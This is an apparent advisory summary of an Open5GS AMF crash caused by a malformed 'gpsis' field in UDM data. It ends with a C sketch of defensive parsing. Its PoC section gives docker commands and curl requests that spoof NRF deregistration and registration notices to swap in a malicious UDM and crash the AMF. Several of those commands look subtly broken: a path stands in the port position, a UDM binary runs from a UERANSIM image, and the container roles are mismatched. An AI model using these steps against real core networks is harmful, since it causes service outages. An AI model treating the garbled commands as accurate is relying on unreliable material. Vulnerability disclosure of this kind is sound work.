# Open5GS AMF Crash Vulnerability Summary

## Vulnerability Overview

A vulnerability exists in the Access and Mobility Management Function (AMF) component of Open5GS that causes a service crash. When a User Equipment (UE) initiates a 5G registration procedure, if the `am-data` response returned by the Unified Data Management (UDM) contains a malformed `gpsis` parameter (e.g., `["msisdn"]` instead of the complete `["msisdn", "value"]`), the AMF will terminate the process due to an assertion failure.

## Impact Scope

- **Affected Component**: Open5GS AMF
- **Trigger Condition**: An external UE initiates registration, and the `gpsis` field in the `am-data` returned by the UDM lacks the second identifier token.
- **Consequence**: The AMF process crashes (Core Dumped), resulting in service unavailability.

## Remediation

According to the issue description, this vulnerability stems from the `ogs_id_get_value` function, which expects to retrieve two tokens separated by a hyphen (`-`) when processing strings. Maliciously crafted input causes the second token to be NULL, thereby triggering the assertion.

**Recommended Fix Direction**: The AMF should handle malformed `gpsis` strings safely rather than crashing directly via assertion.

## POC / Exploit Code

The page provides Docker commands and curl request code to reproduce the vulnerability, simulating a malicious UDM response:

**1. Start the malicious UDM simulation container:**

```bash
docker run -d --name amf-audit-gnb --network open5gs \
  --network-alias gnb.uransim.org \
  -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
  free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
```

**2. Replace the real UDM in the AMF's local cache with the malicious UDM:**

```bash
curl -H 'Content-Type: application/json' \
  -X POST "http://AMF_IP:nrf-nfvr/nf-status-notify" \
  -d '{"event": "NF_DEREGISTERED", "nfInstanceId": "http://nrf.open5gs.org/nrf-nfvr/nf-instances/4568f20e-30..."}'

curl -H 'Content-Type: application/json' \
  -X POST "http://AMF_IP:nrf-nfvr/nf-status-notify" \
  -d '{"event": "NF_REGISTERED", "nfInstanceId": "http://10.33.33.1:10003/nrf-nfvr/nf-instances/fake-uds-amf"}'
```

**3. Start the malicious UDM node and trigger UE registration:**

```bash
docker run -d --name amf-audit-udm --network open5gs \
  --network-alias udm.uransim.org \
  --cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \
  -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/udm.yaml:/ueransim/config/udm.yaml:ro \
  free5gc/ueransim:latest /ueransim/nr-udm -c /ueransim/config/udm.yaml -r
# Subsequently, start the UE to perform the registration process, causing the AMF to crash
```
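
The safe handling recommended under Remediation, sketched as an added example (not Open5GS code and not the project's actual fix): the hypothetical helper `id_get_value_checked` returns NULL for a `type-value` string with a missing part, and the hypothetical caller `handle_gpsi` rejects that one identifier instead of asserting. It assumes the value is everything after the first hyphen; the sample strings are constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper (not Open5GS code): return a heap copy of the value
 * part of a "type-value" identifier such as "msisdn-0123456789", or NULL
 * when the input is malformed. The caller frees the result. */
char *id_get_value_checked(const char *str)
{
    const char *sep, *value;
    char *copy;

    if (str == NULL)
        return NULL;
    sep = strchr(str, '-');
    if (sep == NULL || sep == str)   /* no separator, or empty type */
        return NULL;
    value = sep + 1;
    if (*value == '\0')              /* separator present, value missing */
        return NULL;
    copy = malloc(strlen(value) + 1);
    if (copy != NULL)
        strcpy(copy, value);
    return copy;
}

/* Returns 1 if the GPSI was accepted, 0 if it was rejected as malformed. */
int handle_gpsi(const char *gpsi)
{
    char *value = id_get_value_checked(gpsi);
    if (value == NULL) {
        fprintf(stderr, "rejecting malformed gpsi: \"%s\"\n",
                gpsi ? gpsi : "(null)");
        return 0;   /* fail this one registration; the process keeps running */
    }
    printf("gpsi value: %s\n", value);
    free(value);
    return 1;
}

int main(void)
{
    /* Constructed sample inputs: one well-formed, three malformed. */
    const char *samples[] = { "msisdn-0123456789", "msisdn", "msisdn-", "-0123456789" };
    for (size_t i = 0; i < sizeof(samples) / sizeof(samples[0]); i++)
        handle_gpsi(samples[i]);
    return 0;
}
```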